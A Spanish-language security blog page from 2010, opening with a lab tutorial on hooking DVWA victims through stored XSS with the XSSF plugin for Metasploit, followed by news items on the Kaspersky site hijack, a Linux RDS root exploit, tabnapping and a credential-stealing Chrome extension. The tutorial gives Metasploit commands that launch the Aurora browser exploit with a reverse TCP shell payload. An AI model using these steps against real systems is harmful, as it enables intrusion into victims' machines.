En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.
XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.
Jugando con XSSF
Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.
Lo primero que vamos a hacer es descargar el XSSF framework desdeaquíy descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../
# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF
Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.
Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción ;)
Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":
Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":
Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:
use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"
También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:
use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/
Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:
jobs
xssf_active_victims
xssf_exploit victimID jobID
La empresa rusa de seguridad Kaspersky sufrió un ataque por parte de los cibercriminales contra los cuales trata de protegernos.
Los hackers lograron redirigir la página a otra que instaba a los usuarios a descargar un antivirus de la empresa, que en realidad era un prorgama malware que podía comprometer la seguridad de nuestros datos. El problema ya se ha resuelto, pero durante tres horas y media los visitantes de la página oficial de Kaspersky se vieron afectados por el problema.
Los scammers responsables del ataque trataban de engañar a los usuarios para descargar un software antivirus falso, una actividad que ya lleva tiempo en el mercado y que precisamente afectó recientemente al sitio web de Kaspersky Lab.
Los hackers aprovecharon una vulnerabilidad de un complemento web de una tercera parte usado en el sitio web de Kaspersky en Estados Unidos, y lo reprogramó para redirigir a los usuarios a la descarga de un producto falso.
Kaspersky no dio más datos específicos sobre el problema, pero indicó que “como resultado del ataque, los usuarios que trataban de descargar los productos de Kaspersky Lab eran redirigidos a un sitio malicioso“.
Este fallo se produjo el pasado domingo y durante tres horas y media los visitantes de la página de esta empresa de seguridad fueron redirigidios al sitio web malicioso, pero ya se ha solventado el problema, y de hecho Kaspersky ha realizado una auditoría completa de sus distintos sitios web para evitar problemas.
Última actualización el Sábado, 23 de Octubre de 2010 19:42
El gestor de correo software libre de Mozilla y el popular navegador de la compañía acababa de recibir una nueva actualización, alcanzando la versión 3.1.5 y Firefox 3.6.11 / 3.5.14. Con estas versiones llegan numerosas mejoras en estabilidad y de seguridad, solucionando un grave agujero catalogado como “Altamente Crítico” por Secunia.
Según parece la nueva versión soluciona una vulnerabilidad que anunció Secunia y que permite el escalado de privilegios, saltarse medidas de seguridad, realizar ataques spoof, y en último lugar comprometer el equipo.
Puedes leer más sobre el mismo en los avisos de seguridad de Mozilla:
El investigador de seguridad que encontró e informó de la última vulnerabilidad crítica que conseguía provocar buffer overflow y corrupción de memoria en Firefox es Alex Miller, un niño de 12 años que ha ganado por ello nada menos que 3.000 dólares. Según San Jose Mercury News, Miller empezó a buscar vulnerabilidades después de que Mozilla incrementase la recompensa de 500 a3.000 dólares.
El estudiante de 7º curso se describe como leal a Firefox y ya había enviado vulnerabilidades que no tenían suficiente importancia como para recibir el pago. Sin embargo Alex siguió investigando el funcionamiento deFirefox y tras una hora y media durante 10 días encontró un problema grave de memoria, es decir, le ha salido a 200 dólares la hora de trabajo.
Un fallo en la implementación delprotocolo RDS (Reliable Datagram Sockets) en el núcleo Linux puede ser explotado para lograr privilegios de root (o superusuario) o permisos para acceder al sistema de la víctima.
Los atacantes pueden explotar la vulnerabilidad para lograr control remoto completo una vez que se hayan introducido en el sistema. Dan Rosenberg, que descubrió la vulnerabilidad, ha publicado un exploit unpequeño código en C con el propósito de demostrar cómo funciona dicha vulnerabilidad.
La vulnerabilidad afecta a varias versiones del kernel Linux, y se sabe que al menos desde el kernel 2.6.30 al 2.6.36-rc8 existe dicho problema.
Los desarrolladores de este componente han publicado ya un parche en el repositorio Git del núcleo que permite solucionar el problema, y es muy probable que los desarrolladores de distribuciones apliquen el parche de forma inmediata para ofrecer esa actualización de seguridad cuanto antes.
Si no es el caso, Rosenberg ha propuesto una forma alternativa de solucionarlo al menos provisionalmente. Para ello hay que ejecutar el comando (como root):
Aunque la mayoría de los sistemas no se verán afectados por el problema ya que no utilizan este protocolo.
Rosenberg explicó además que el problema proviene de que las funciones en el protocolo RDS no comprueban correctamente las direcciones que se dan cuando los datos se copian desde la memoria del núcleo a la memoria del usuario. Como resultado, un usuario local puede indicar una dirección básica del núcleo para una estructura socket, lo que permite que se pueda escribir código en la memoria del núcleo… y luego ejecutar ese código con privilegios de ese núcleo cuando se hacen llamadas a ciertos sockets.
Última actualización el Sábado, 23 de Octubre de 2010 18:16
La plataforma Exchange de Microsoft es una de las más extendidas en todo el mundo a la hora de centralizar la gestión del correo y de varias aplicaciones colaborativas, pero lo que probablemente muchas empresas no sepan es que hay diversas soluciones Open Source que acercan esas prestaciones al mundo Linux siguiendo esa filosofía que entre otras cosas es posible aprovechar para poner en marcha alternativas a Exchange mucho más económicas.
En Linux.com han realizado un pequeño análisis de cuatro de esas alternativas a Exchange que permiten acceder a las funciones que proporciona Exchange pero de un modo que puede recortar muchos gastos.
Última actualización el Jueves, 05 de Agosto de 2010 05:59
El proyecto portablelinuxapps nos trae el maravilloso mundo de las aplicaciones portables a GNU/Linux. Esto implica que ya podemos disponer en nuestras memorias USB de nuestros programas favoritos para ejecutarlos en cualquier equipo con Linux o simplemente probarlos.
Más interesante aún es el hecho de poder utilizar el mismo ejecutable en distintas distribuciones como por ejemplo, Ubuntu y Fedora. Y, además, podemos despedirnos de las dependencias o de descomprimir el archivo. La mecánica en PORTABLELINUXAPPS.org es tan simple como descargar el programa, hacerlo ejecutable y ejecutarlo. A día de hoy ya cuentan con 53 aplicaciones tan variadas como Opera 10.70, TeamViewer 5 o Audacity por nombrar algunas pero su número crece rápidamente.
¿Te apetece verlo con un ejemplo? Comenzamos…
El primer paso consiste en visitar PORTABLELINUXAPPS.org y hacer clic sobre el icono del programa que queramos utilizar.
Hacemos clic sobre el icono de la aplicación que nos interese
Última actualización el Sábado, 24 de Julio de 2010 03:30
Si sos usuario de chrome se recomienda tener mucho cuidado al instalar extensiones o componentes de terceros, siempre hay que verificar que vengan de una fuente confiable. El programador de Malta Andreas Grech desarrollo un plugin utilizando JQuery para rastrear la información de login de los usuarios y enviársela por correo electrónico, el resultado que tuvo fue favorable obteniendo acceso a cuentas de twitter, facebook, gmail, etc.
El navegador Chrome permite la instalación de extensiones desarrolladas por terceros para ampliar las posibilidades del navegador, estas extensiones desarrolladas en JavaScript y HTML permiten la manipulación del Document Object Model y a traves de el acceder y modificar la estructura de documentos HTML y XML, pero a su vez tambien permite leer la información de campos de formularios y enviarlos via mail mediante una sencilla rutina en AJAX.
Para mas detalles del codigo de este plugin pueden verse en el sitio del programador: http://blog.dreasgrech.com/
Hasta el momento google no se ha pronunciado respecto a esto, por lo cual se recomienda ser muy cuidadosos en la instalación de extensiones en Chrome.
Última actualización el Sábado, 17 de Julio de 2010 06:56
Reinstalar tus aplicaciones favoritas e importar la configuración de esas aplicaciones en tu reciente instalación de Ubuntu puede convertirse en un trabajo tedioso. Ya no más gracias a la iniciativa "OneConf" que, aunque todavía no alcanzó una versión final, ya está disponible para que la pruebes
Diseñado por los desarrolladores de Ubuntu para guardar una lista de los programas instalados y sus configuraciones, OneConf sincronizará esta información con Ubuntu One, el servicio de almacenamiento en la nube de Canonical. Luego, con hacer un simple clic, OneConf podrá reinstalar y restaurar todas tus aplicaciones y configuraciones. Como si nada hubiera pasado...
Incluso se especula con la idea de que OneConf se incorpore al nuevo instalador de Ubuntu, permitiendo a los usuarios retaurar sus aplicaciones y configuraciones directamente desde allí.
NOTA: Aquellos que desean probarlo pueden realizarlo a travez de elwiki del proyecto (esta en fase de desarrollo, NO Recomendado para usos en producción), donde se encuentra detallado las instrucciones.
Última actualización el Sábado, 17 de Julio de 2010 06:48
Bueno, después de vario tiempo de tener abandonada la web estamos de regreso!.
En esta ocasión les voy a presentar una pagina para poder realizar plantillas para joomla, wordpress, ASP.net y html con css, desde cero la gran ventaja que tenemos del CMS como wordpress por ejemplo es la facilidad de poder modificar su aspecto a gusto de uno, sin embargo hacer algunas veces esto resulta muy complicado para los menos experimentados.
Sin dar mas vuela al asunto les presento la solución perfecta para no complicarse la vida creando plantillas conCOOL TEMPLATEy una de las grandes ventajas es que es un servicio gratuito, no tendrás la necesidad de instalar ningún software ya que todo se realiza a través de la web, la interfaz que utiliza esta web esta realizada en Ajax de fácil manejo, pudiendo personalizar la edicion de menus, logos, imagenes de fondo, tipo de letra, tamaño, posición de las barras aspectos entre otras cosas.
El sitio nos pide un registro aunque también puedes probarlo sin registrarte para probar la facilidad del manejo de la interfaz (pero no podrás descargar la plantilla final). Los diseños que vayamos creando se almacenaran en nuestra cuenta creada, de manera que podamos acceder nuevamente a ellas y poder modificarlas utilizando el mismo editor cuando nosotros queramos.
Ofrece la opción de crear nuestra propia “exportación”: un conjunto de archivos que se añadirán a la descarga de la plantilla terminada, de manera que podamos personalizar el formato para otro CMS distinto. El sitio incluye un editor de texto para la creación o modificación de estos archivos. Personalmente, lo veo ideal para aquellos que, sin muchos conocimientos, desean crear su propio tema. O también, y quizá principalmente, para utilizarlo como base para desarrollarlo, ahorrándonos tener que partir de cero.
Última actualización el Jueves, 15 de Julio de 2010 06:55
Uno de los principales creadores de Firefox Aza Raskin descubrió un nuevo tipo de ataque de phishing. Esta técnica se llama “Tabnapping” que hace uso de JavaScript para cambiar el contenido de un pestaña o tab mientras el usuario se centra en otro.
El ataque se probó en Firefox con varias pestañas abiertas y debería funcionar en otros navegadores. Para que la realización de este ataque el usuario primero debe ir a la página Web maliciosa.
El script de la página maliciosa permanentemente se fija si la pestaña ha perdido el foco, es decir, que el usuario está buscando en otra pestaña. Después de unos segundos este, cambia el favicon (icono de la pestaña) y el contenido de la página por una página de phishing, sin embargo, la dirección no cambia.
Finalmente, se cargo la página falsa, por ejemplo, de Gmail y te roban las credenciales.
Última actualización el Lunes, 31 de Mayo de 2010 06:26
Thecorpora presenta Qbo, un nuevo robot de código abierto (desarrollado en Java y C++ bajo el sistema operativo Linux) que cuenta con visión estereoscópica, sistema de reconocimiento de voz, sistema para la Síntesis de la Voz, API y Panel de Control Web, conexión Wi-Fi & Bluetooth, así como sensores de ultrasonido para evitar colisiones y caídas.
Este nuevo robot open source iniciado por Francisco Paz se suma a proyectos como el PR2 de Willow Garage e iCub de RobotCub Consortium. No sabemos cuándo estará disponible, pero sus especificaciones (reveladas hoy en el blog de Thecorpora) son bastante interesantes.
